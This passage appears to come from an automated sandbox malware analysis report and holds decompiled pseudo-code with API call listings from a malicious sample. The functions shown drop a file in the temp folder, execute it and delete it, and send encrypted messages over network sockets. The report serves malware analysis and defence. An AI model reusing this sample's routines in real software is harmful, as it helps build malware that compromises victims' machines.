						L00391CB0();
						_t78 = _t78 + 4;
						L15:
						goto L16;
					}
					_t71 = _a8;
					if( *((intOrPtr*)(_t74 + 0x10)) <=  *((intOrPtr*)( *_t71 + 0x10))) {
						goto L14;
					}
					_t68 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t68 + 0xac))))(0x3b8594);
					_t52 =  *_t71;
					if(_t52 != 0) {
						E0039CB70(_t52, _t52, _t71);
						_push(_t52);
						L00391CB0();
						_t78 = _t78 + 4;
					}
					 *_t71 = _t74;
					_t59 =  *0x3b8628; // 0x593938
					_t69 =  *((intOrPtr*)(_t59 + 0xc4));
					 *_t69(0x3b8594);
					_t76 = 0;
					if( *((intOrPtr*)( *_t71 + 0x18)) <= 0) {
						L13:
						_t51 = 1;
						goto L15;
					} else {
						_t53 = __imp___time64;
						do {
							_t47 =  *_t53(0);
							_t61 =  *((intOrPtr*)( *_t71 + 0x28));
							 *((intOrPtr*)(_t61 + _t76 * 8)) = _t47;
							 *((intOrPtr*)(_t61 + 4 + _t76 * 8)) = _t69;
							_t69 =  *_t71;
							_t76 = _t76 + 1;
							_t78 = _t78 + 4;
						} while (_t76 <  *((intOrPtr*)(_t69 + 0x18)));
						goto L13;
					}
				}
				E00399090(_t81,  &_v212, 0x10);
				_t34 = E00393C70( &_v212,  &_v212,  &_v8,  &_v12);
				_t78 = _t78 + 0x14;
				if(_t34 == 0) {
					goto L17;
				}
				goto L2;
			}























    0x003b0a40
    0x003b0a40
    0x003b0a50
    0x003b0a58
    0x003b0a5b
    0x003b0a5e
    0x003b0a72
    0x003b0a77
    0x003b0a7a
    0x003b0a7c
    0x003b0aab
    0x003b0aae
    0x003b0ba5
    0x003b0bab
    0x003b0bab
    0x003b0ab8
    0x003b0b95
    0x003b0b95
    0x003b0b9a
    0x003b0b9d
    0x003b0ba2
    0x00000000
    0x003b0b9a
    0x003b0abe
    0x003b0ac0
    0x003b0ac5
    0x003b0aca
    0x00000000
    0x00000000
    0x003b0ad0
    0x003b0ad8
    0x003b0adc
    0x003b0b94
    0x00000000
    0x003b0b94
    0x003b0ae8
    0x003b0af7
    0x003b0afc
    0x003b0b01
    0x003b0b83
    0x003b0b85
    0x003b0b8a
    0x003b0b8b
    0x003b0b90
    0x003b0b93
    0x00000000
    0x003b0b93
    0x003b0b07
    0x003b0b12
    0x00000000
    0x00000000
    0x003b0b14
    0x003b0b25
    0x003b0b27
    0x003b0b2b
    0x003b0b2f
    0x003b0b34
    0x003b0b35
    0x003b0b3a
    0x003b0b3a
    0x003b0b3d
    0x003b0b3f
    0x003b0b45
    0x003b0b50
    0x003b0b54
    0x003b0b59
    0x003b0b7c
    0x003b0b7c
    0x00000000
    0x003b0b5b
    0x003b0b5b
    0x003b0b61
    0x003b0b63
    0x003b0b67
    0x003b0b6a
    0x003b0b6d
    0x003b0b71
    0x003b0b73
    0x003b0b74
    0x003b0b77
    0x00000000
    0x003b0b61
    0x003b0b59
    0x003b0a87
    0x003b0a9b
    0x003b0aa0
    0x003b0aa5
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
    • ??2@YAPAXI@Z.MSVCRT ref: 003B0AC0
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0B35
    • _time64.MSVCRT ref: 003B0B63
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003B0B8B
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039F850, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102
    C-Code - Quality: 94%
    			E0039F850(void* __ebx, void* __ecx) {
				intOrPtr _t29;
				intOrPtr _t34;
				void* _t47;
				intOrPtr _t51;
				intOrPtr _t55;
				void* _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t62;
				void* _t63;

				_t47 = __ebx;
				_t61 = __ecx;
				_t19 =  *((intOrPtr*)(__ecx + 0x14));
				if( *((intOrPtr*)(__ecx + 0x14)) != 0) {
					E0039BB40(_t19);
					_t63 = _t63 + 4;
				}
				_t20 =  *((intOrPtr*)(_t61 + 0x28));
				if( *((intOrPtr*)(_t61 + 0x28)) != 0) {
					E0039BB40(_t20);
					_t63 = _t63 + 4;
				}
				_t21 =  *((intOrPtr*)(_t61 + 0x1c));
				if( *((intOrPtr*)(_t61 + 0x1c)) != 0) {
					E0039BB40(_t21);
					_t63 = _t63 + 4;
				}
				_t22 =  *((intOrPtr*)(_t61 + 0x2c));
				if( *((intOrPtr*)(_t61 + 0x2c)) != 0) {
					E0039BB40(_t22);
					_t63 = _t63 + 4;
				}
				_t23 =  *((intOrPtr*)(_t61 + 0x20));
				if( *((intOrPtr*)(_t61 + 0x20)) != 0) {
					E0039BB40(_t23);
					_t63 = _t63 + 4;
				}
				_t24 =  *((intOrPtr*)(_t61 + 0x18));
				if( *((intOrPtr*)(_t61 + 0x18)) != 0) {
					E0039BB40(_t24);
					_t63 = _t63 + 4;
				}
				E003916B0(_t61 + 0x30);
				_t26 =  *((intOrPtr*)(_t61 + 0x64));
				if( *((intOrPtr*)(_t61 + 0x64)) != 0) {
					E0039BB40(_t26);
					_t63 = _t63 + 4;
				}
				_t27 =  *((intOrPtr*)(_t61 + 0x5c));
				if( *((intOrPtr*)(_t61 + 0x5c)) != 0) {
					E0039BB40(_t27);
					_t63 = _t63 + 4;
				}
				_t28 =  *((intOrPtr*)(_t61 + 0x60));
				if( *((intOrPtr*)(_t61 + 0x60)) != 0) {
					E0039BB40(_t28);
					_t63 = _t63 + 4;
				}
				_t29 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xac))))(0x3b8594, _t57);
				_t58 =  *((intOrPtr*)(_t61 + 4));
				if(_t58 != 0) {
					E00396E10(_t47, _t58);
					_push(_t58);
					L00391CB0();
					_t63 = _t63 + 4;
				}
				_t59 =  *((intOrPtr*)(_t61 + 0xc));
				if(_t59 != 0) {
					E00396730(_t59);
					_push(_t59);
					L00391CB0();
					_t63 = _t63 + 4;
				}
				_t55 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0xc4))))(0x3b8594);
				 *((intOrPtr*)(_t61 + 0x4fc)) = 0x3b32ec;
				_t62 =  *((intOrPtr*)(_t61 + 0x504));
				if(_t62 != 0) {
					_push(_t62);
					L00391CB0();
				}
				_t51 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xac))))(0x3b8600);
				_t34 =  *0x3b8628; // 0x593938
				 *0x3b8618 =  *0x3b8618 - 1;
				return  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc4))))(0x3b8600);
			}














    0x0039f850
    0x0039f851
    0x0039f853
    0x0039f858
    0x0039f85b
    0x0039f860
    0x0039f860
    0x0039f863
    0x0039f868
    0x0039f86b
    0x0039f870
    0x0039f870
    0x0039f873
    0x0039f878
    0x0039f87b
    0x0039f880
    0x0039f880
    0x0039f883
    0x0039f888
    0x0039f88b
    0x0039f890
    0x0039f890
    0x0039f893
    0x0039f898
    0x0039f89b
    0x0039f8a0
    0x0039f8a0
    0x0039f8a3
    0x0039f8a8
    0x0039f8ab
    0x0039f8b0
    0x0039f8b0
    0x0039f8b6
    0x0039f8bb
    0x0039f8c0
    0x0039f8c3
    0x0039f8c8
    0x0039f8c8
    0x0039f8cb
    0x0039f8d0
    0x0039f8d3
    0x0039f8d8
    0x0039f8d8
    0x0039f8db
    0x0039f8e0
    0x0039f8e3
    0x0039f8e8
    0x0039f8e8
    0x0039f8eb
    0x0039f8fc
    0x0039f8fe
    0x0039f903
    0x0039f907
    0x0039f90c
    0x0039f90d
    0x0039f912
    0x0039f912
    0x0039f915
    0x0039f91a
    0x0039f91e
    0x0039f923
    0x0039f924
    0x0039f929
    0x0039f929
    0x0039f92c
    0x0039f93d
    0x0039f93f
    0x0039f949
    0x0039f952
    0x0039f954
    0x0039f955
    0x0039f95a
    0x0039f95d
    0x0039f96e
    0x0039f970
    0x0039f975
    0x0039f989

    APIs
      • Part of subcall function 003916B0: memset.MSVCRT ref: 003916EE
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F955
      • Part of subcall function 00396E10: ??3@YAXPAX@Z.MSVCRT ref: 00396E42
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F90D
    • ??3@YAXPAX@Z.MSVCRT ref: 0039F924
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B04A0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66
    C-Code - Quality: 94%
    			E003B04A0(void* __ecx, intOrPtr* _a4, signed int _a8) {
				void _v1022;
				short _v1024;
				char _v1028;
				char _v1540;
				char _v2052;
				long _t21;
				intOrPtr* _t22;
				intOrPtr _t34;
				intOrPtr* _t41;
				void* _t48;
				void* _t54;

				memset( &_v2052, 0, 0x800);
				_t21 = GetTempPathA(0x104,  &_v2052);
				_t41 = _a4;
				_t34 =  *_t41;
				 *((intOrPtr*)(_t54 + _t21 - 0x800)) = 0x61676571;
				_t22 =  &_v1540;
				if(_t34 != 0) {
					_t48 = _t41 - _t22;
					do {
						 *_t22 = _t34;
						_t34 =  *((intOrPtr*)(_t48 + _t22 + 1));
						_t22 = _t22 + 1;
					} while (_t34 != 0);
				}
				asm("sbb edx, edx");
				 *_t22 = ( ~_a8 & 0xffff0000) + 0x5d385b20;
				_t11 =  &_v2052; // 0x61676571
				E003B03D0(_t11,  &_v1540, _t22 -  &_v1540 + 4);
				_v1024 = 0x696e;
				_v1028 = 0x69676572;
				_t14 =  &_v2052; // 0x61676571
				_t16 =  &_v1028; // 0x69676572
				memcpy( &_v1022, _t14, 0x80 << 2);
				E003B0420(_t16);
				_t18 =  &_v2052; // 0x61676571
				return DeleteFileA(_t18);
			}














    0x003b04bc
    0x003b04d0
    0x003b04d6
    0x003b04d9
    0x003b04db
    0x003b04e6
    0x003b04ee
    0x003b04f2
    0x003b04f4
    0x003b04f4
    0x003b04f6
    0x003b04fa
    0x003b04fb
    0x003b04f4
    0x003b0504
    0x003b0512
    0x003b0523
    0x003b052c
    0x003b0536
    0x003b053d
    0x003b054c
    0x003b0558
    0x003b055e
    0x003b0563
    0x003b0568
    0x003b057b

    APIs
    • memset.MSVCRT ref: 003B04BC
    • GetTempPathA.KERNEL32(00000104,?), ref: 003B04D0
      • Part of subcall function 003B03D0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 003B03EA
      • Part of subcall function 003B03D0: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003B0401
      • Part of subcall function 003B03D0: CloseHandle.KERNEL32(00000000), ref: 003B0408
      • Part of subcall function 003B0420: memset.MSVCRT ref: 003B042F
      • Part of subcall function 003B0420: CreateProcessA.KERNEL32(00000000,003B0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003B0468
      • Part of subcall function 003B0420: WaitForSingleObject.KERNEL32(?,00002710), ref: 003B047E
      • Part of subcall function 003B0420: CloseHandle.KERNEL32(?), ref: 003B048E
      • Part of subcall function 003B0420: CloseHandle.KERNEL32(?), ref: 003B0494
    • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 003B056F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A43AE, Relevance: 7.7, APIs: 5, Instructions: 162network
    C-Code - Quality: 26%
    			E003A43AE(intOrPtr* _a4, void* _a8, void* _a12) {
				void* _v8;
				void* _v12;
				void _v32;
				void _v148;
				signed int _t44;
				void* _t53;
				void* _t63;
				signed int _t64;
				signed short _t77;
				int _t79;
				signed int _t80;
				signed int* _t88;
				signed int _t93;
				void* _t95;
				intOrPtr* _t102;
				void* _t103;
				void* _t108;
				void* _t109;
				void* _t110;

				_t95 =  *0x3b8538(0x200);
				_v12 = _t95;
				_v8 =  *0x3b8538(0x200);
				memset(_t95, 0, 0x1fd);
				 *_t95 = 5;
				if(_a12 == 0) {
					_t44 = 0;
				} else {
					_t77 =  *(_a4 + 0x138) & 0x0000ffff;
					__imp__#9(_t77);
					_t44 = _t77 & 0x0000ffff;
				}
				_t108 = _a8;
				_push(0x1fd);
				 *(_t95 + 3) = _t44;
				_push(_t95);
				if(_t108 == 0) {
					_t108 = _a4 + 8;
				}
				 *0x3b899c(_t108);
				_t80 = 0x1d;
				memcpy( &_v148, _t108, _t80 << 2);
				_t109 =  *0x3b8538(0x14);
				_a12 = _t109;
				 *0x3b8ab0( &_v148, _t109);
				memcpy( &_v32, _t109, 0 << 2);
				 *0x3b8540(_a12, 5);
				_t110 = _v12;
				 *((intOrPtr*)(_t110 + 5)) = _v32;
				_t53 = _a8;
				if(_t53 == 0) {
					memset(_v8, 0, 0x200);
					_t102 = _a4;
					_t32 = _t102 + 0x120; // 0x120
					_t33 = _t102 + 0x110; // 0x110
					_t35 = _t102 + 0xf0; // 0xf0
					if(E003A3BB7(_t35, _t110, 0x1fd, _v8 + 3, _t33, _t32) == 0) {
						goto L12;
					} else {
						_t79 = 0x200;
						goto L11;
					}
				} else {
					_t103 = _v8;
					_t22 = _t53 + 0x118; // 0x118
					_t23 = _t53 + 0x108; // 0x108
					if(E003A3BB7(_t53 + 0xe8, _t110, 0x1fd, _t103, _t23, _t22) == 0) {
						L13:
						 *0x3b8540(_t110);
						 *0x3b8540(_t103);
						_t63 = 0;
					} else {
						_t71 = _a4;
						_t25 = _t71 + 0x120; // 0x120
						_t26 = _t71 + 0x110; // 0x110
						if(E003A3BB7(_a4 + 0xf0, _t103, 0x1fd, _t110, _t26, _t25) == 0) {
							goto L13;
						} else {
							_t79 = 0x200;
							memset(_t103, 0, 0x200);
							_t93 = 0x7f;
							memcpy(_t103 + 3, _t110, _t93 << 2);
							asm("movsb");
							_t102 = _a4;
							_t110 = _v12;
							L11:
							_t64 =  *(_t102 + 4) & 0x0000ffff;
							__imp__#9(_t64);
							_t88 = _v8;
							 *_t88 = _t64;
							_t88[0] = 3;
							if(E003AFD0B( *_t102, _t88, _t79) == _t79) {
								 *0x3b8540(_t110);
								 *0x3b8540(_v8);
								_t63 = 1;
							} else {
								L12:
								_t103 = _v8;
								goto L13;
							}
						}
					}
				}
				return _t63;
			}






















    0x003a43c6
    0x003a43c9
    0x003a43d9
    0x003a43dc
    0x003a43e8
    0x003a43eb
    0x003a4403
    0x003a43ed
    0x003a43f0
    0x003a43f8
    0x003a43fe
    0x003a43fe
    0x003a4405
    0x003a4408
    0x003a4409
    0x003a440d
    0x003a4410
    0x003a4415
    0x003a4415
    0x003a4419
    0x003a4421
    0x003a442a
    0x003a4432
    0x003a443d
    0x003a4440
    0x003a444f
    0x003a4451
    0x003a445a
    0x003a445d
    0x003a4460
    0x003a4466
    0x003a44e8
    0x003a44ed
    0x003a44f0
    0x003a44f7
    0x003a4506
    0x003a4518
    0x00000000
    0x003a451a
    0x003a451a
    0x00000000
    0x003a451a
    0x003a4468
    0x003a4468
    0x003a446b
    0x003a4472
    0x003a448c
    0x003a4547
    0x003a4548
    0x003a454f
    0x003a4555
    0x003a4492
    0x003a4492
    0x003a4495
    0x003a449c
    0x003a44b6
    0x00000000
    0x003a44bc
    0x003a44bc
    0x003a44c5
    0x003a44d2
    0x003a44d3
    0x003a44d5
    0x003a44d6
    0x003a44d9
    0x003a451f
    0x003a451f
    0x003a4524
    0x003a452a
    0x003a452f
    0x003a4532
    0x003a4542
    0x003a455a
    0x003a4563
    0x003a456b
    0x003a4544
    0x003a4544
    0x003a4544
    0x00000000
    0x003a4544
    0x003a4542
    0x003a44b6
    0x003a448c
    0x003a4572

    APIs
    • memset.MSVCRT ref: 003A43DC
    • htons.WS2_32(?), ref: 003A43F8
    • memset.MSVCRT ref: 003A44C5
    • memset.MSVCRT ref: 003A44E8
      • Part of subcall function 003A3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
      • Part of subcall function 003A3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
      • Part of subcall function 003A3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
      • Part of subcall function 003A3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
      • Part of subcall function 003A3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    • htons.WS2_32(?), ref: 003A4524
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFDE5
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFDF7
      • Part of subcall function 003AFD0B: memcpy.MSVCRT ref: 003AFE15
      • Part of subcall function 003AFD0B: memset.MSVCRT ref: 003AFE5E
      • Part of subcall function 003AFD0B: htons.WS2_32(00000301), ref: 003AFEB9
      • Part of subcall function 003AFD0B: htons.WS2_32(?), ref: 003AFEC2
      • Part of subcall function 003AFD0B: send.WS2_32(?,?,?,00000000), ref: 003AFED4
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003999A0, Relevance: 7.6, APIs: 5, Instructions: 143network
    C-Code - Quality: 48%
    			E003999A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v252;
				char _v452;
				char _v852;
				char* _t43;
				char _t44;
				intOrPtr _t50;
				char _t51;
				void* _t56;
				void* _t57;
				char* _t59;
				intOrPtr _t62;
				void* _t64;
				void* _t85;
				void* _t86;

				_t43 =  &_v852;
				_v20 = 0;
				_t64 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__#115(0x202, _t43, __edi, __esi, __ebx);
				if(_t43 != 0) {
					L17:
					_t44 = _v8;
				} else {
					_t64 = E003A1D90(0x100, 0);
					_t86 = _t86 + 8;
					if(_t64 != 0) {
						_t50 = E00398730(_a4);
						_v20 = _t50;
						if(_t50 != 0) {
							_t51 = _v8;
							_t85 = 0;
							while(1) {
								_t69 = _v12;
								if(_v12 != 0) {
									E0039BB40(_t69);
									_t51 = _v8;
									_t86 = _t86 + 4;
								}
								_v12 = 0;
								_t92 = _t51;
								if(_t51 != 0) {
									__imp__freeaddrinfo(_t51);
								}
								_v8 = 0;
								E00399090(_t92,  &_v452, 0x22);
								_t14 = _t85 + 0x3b32f0; // 0xb6
								E00399090(_t92,  &_v252,  *_t14);
								_push( &_v252);
								_t56 = E003A0C10(_t64, 0x80,  &_v452, _v20);
								_t86 = _t86 + 0x24;
								if(_t56 < 0) {
									goto L17;
								}
								_t57 = E00397E20(_t64, 0,  &_v12, 0xffffffff);
								_t86 = _t86 + 0x10;
								if(_t57 == 0) {
									goto L17;
								} else {
									_v48 = 0;
									_v44 = 0;
									_v52 = 0;
									_v40 = 0;
									_v36 = 0;
									_v32 = 0;
									_v28 = 0;
									_v24 = 0;
									_t59 =  &_v8;
									_v44 = 1;
									_v48 = 2;
									__imp__getaddrinfo(_v12, 0,  &_v52, _t59);
									if(_t59 != 0) {
										L14:
										_t51 = _v8;
										goto L15;
									} else {
										_t51 = _v8;
										if(_t51 != 0) {
											_t37 = _t85 + 0x3b802c; // 0x39aa10
											_t62 =  *((intOrPtr*)( *_t37))( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0x18)) + 4)));
											_t86 = _t86 + 4;
											_v16 = _t62;
											__eflags = _t62;
											if(__eflags != 0) {
												goto L17;
											} else {
												goto L14;
											}
										} else {
											_v16 = 0;
											L15:
											_t85 = _t85 + 4;
											if(_t85 < 0x14) {
												continue;
											} else {
											}
										}
									}
								}
								goto L18;
							}
						}
					}
					goto L17;
				}
				L18:
				if(_t44 != 0) {
					__imp__freeaddrinfo(_t44);
				}
				if(_t64 != 0) {
					E0039BB40(_t64);
					_t86 = _t86 + 4;
				}
				_t45 = _v20;
				if(_v20 != 0) {
					E0039BB40(_t45);
				}
				__imp__#116();
				return _v16;
			}





























    0x003999ac
    0x003999bc
    0x003999bf
    0x003999c1
    0x003999c4
    0x003999c7
    0x003999ca
    0x003999d2
    0x00399b06
    0x00399b06
    0x003999d8
    0x003999e3
    0x003999e5
    0x003999ea
    0x003999f6
    0x003999fb
    0x00399a00
    0x00399a06
    0x00399a09
    0x00399a10
    0x00399a10
    0x00399a15
    0x00399a18
    0x00399a1d
    0x00399a20
    0x00399a20
    0x00399a23
    0x00399a26
    0x00399a28
    0x00399a2b
    0x00399a2b
    0x00399a3a
    0x00399a3d
    0x00399a42
    0x00399a50
    0x00399a5e
    0x00399a6d
    0x00399a72
    0x00399a77
    0x00000000
    0x00000000
    0x00399a85
    0x00399a8a
    0x00399a8f
    0x00000000
    0x00399a91
    0x00399a96
    0x00399a99
    0x00399a9c
    0x00399a9f
    0x00399aa2
    0x00399aa5
    0x00399aa8
    0x00399aab
    0x00399aae
    0x00399ab8
    0x00399abf
    0x00399ac6
    0x00399ace
    0x00399af5
    0x00399af5
    0x00000000
    0x00399ad0
    0x00399ad0
    0x00399ad5
    0x00399ae2
    0x00399ae9
    0x00399aeb
    0x00399aee
    0x00399af1
    0x00399af3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00399ad7
    0x00399ad7
    0x00399af8
    0x00399af8
    0x00399afe
    0x00000000
    0x00000000
    0x00399b04
    0x00399afe
    0x00399ad5
    0x00399ace
    0x00000000
    0x00399a8f
    0x00399a10
    0x00399a00
    0x00000000
    0x003999ea
    0x00399b09
    0x00399b0b
    0x00399b0e
    0x00399b0e
    0x00399b16
    0x00399b19
    0x00399b1e
    0x00399b1e
    0x00399b21
    0x00399b29
    0x00399b2c
    0x00399b31
    0x00399b34
    0x00399b40

    APIs
    • WSAStartup.WS2_32(00000202,?), ref: 003999CA
    • freeaddrinfo.WS2_32(?), ref: 00399A2B
      • Part of subcall function 003A0C10: _vsnwprintf.MSVCRT ref: 003A0C42
    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 00399AC6
    • freeaddrinfo.WS2_32(?), ref: 00399B0E
    • WSACleanup.WS2_32 ref: 00399B34
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A56CF, Relevance: 7.6, APIs: 5, Instructions: 133network
    C-Code - Quality: 31%
    			E003A56CF(intOrPtr* __eax, void* __ecx, void* __eflags, void* _a4) {
				void* _v8;
				void* _v12;
				char _v32;
				void _v148;
				void* __esi;
				short _t42;
				short _t43;
				short _t44;
				void* _t60;
				void _t61;
				intOrPtr* _t74;
				void* _t76;
				signed int _t77;
				intOrPtr* _t87;
				void* _t95;
				void* _t97;
				void* _t98;

				_t76 = __ecx;
				_t74 = __eax;
				_t95 =  *0x3b8538(0x200);
				_v8 = _t95;
				_v12 =  *0x3b8538(0x200);
				memset(_t95, 0, 0x1fd);
				 *_t95 = 0x21;
				_t42 = E003AE937(_t76);
				_t87 = __imp__#9;
				 *((short*)(_t74 + 0x138)) = _t42;
				_t43 =  *_t87(_t42);
				 *((short*)(_t95 + 3)) = _t43;
				_t44 =  *_t87(0x14);
				_t77 = 5;
				 *((short*)(_t95 + 9)) = _t44;
				_t6 = _t95 + 0xb; // 0xb
				memcpy(_t6, _a4, _t77 << 2);
				_t97 = _t74 + 8;
				 *0x3b899c(_t97, _v8, 0x1fd);
				memcpy( &_v148, _t97, 0 << 2);
				 *0x3b8ab0( &_v148,  &_v32, 0x1d);
				_t98 = _v12;
				 *((intOrPtr*)(_v8 + 5)) = _v32;
				memset(_t98, 0, 0x200);
				if(E003A3BB7(_t74 + 0xf0, _v8, 0x1fd, _t98 + 3, _t74 + 0x110, _t74 + 0x120) == 0) {
					L7:
					 *0x3b8540(_v8);
					 *0x3b8540(_t98);
					_t60 = 0;
				} else {
					_t61 =  *(_t74 + 4) & 0x0000ffff;
					__imp__#9(_t61);
					 *_t98 = _t61;
					 *((char*)(_t98 + 2)) = 3;
					if(E003AFD0B( *_t74, _t98, 0x200) != 0x200) {
						goto L7;
					} else {
						if(E003AFB73( *_t74, _v8, 0x200) != 0x200 ||  *((char*)(_v8 + 2)) != 3 || E003A3BB7(_t74 + 0x100, _v8 + 3, 0x1fd, _v12, _t74 + 0x124, _t74 + 0x134) == 0 ||  *_v12 != 0x27) {
							_t98 = _v12;
							goto L7;
						} else {
							 *0x3b8540(_v8);
							 *0x3b8540(_v12);
							_t60 = 1;
						}
					}
				}
				return _t60;
			}




















    0x003a56cf
    0x003a56e1
    0x003a56e9
    0x003a56ec
    0x003a56fd
    0x003a5700
    0x003a5708
    0x003a570b
    0x003a5710
    0x003a5717
    0x003a571e
    0x003a5722
    0x003a5726
    0x003a572a
    0x003a572b
    0x003a572f
    0x003a573d
    0x003a573f
    0x003a5743
    0x003a575d
    0x003a575f
    0x003a576b
    0x003a5777
    0x003a577a
    0x003a57aa
    0x003a5823
    0x003a5826
    0x003a582d
    0x003a5833
    0x003a57ac
    0x003a57ac
    0x003a57b1
    0x003a57b8
    0x003a57bb
    0x003a57cc
    0x00000000
    0x003a57ce
    0x003a57dd
    0x003a5820
    0x00000000
    0x003a5837
    0x003a583a
    0x003a5843
    0x003a584b
    0x003a584b
    0x003a57dd
    0x003a57cc
    0x003a5852

    APIs
    • memset.MSVCRT ref: 003A5700
    • htons.WS2_32(00000000), ref: 003A571E
    • htons.WS2_32(00000014), ref: 003A5726
    • memset.MSVCRT ref: 003A577A
